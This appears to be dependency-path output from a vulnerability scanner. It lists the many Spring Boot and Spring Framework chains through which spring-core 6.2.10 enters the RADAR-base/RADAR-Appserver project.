Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
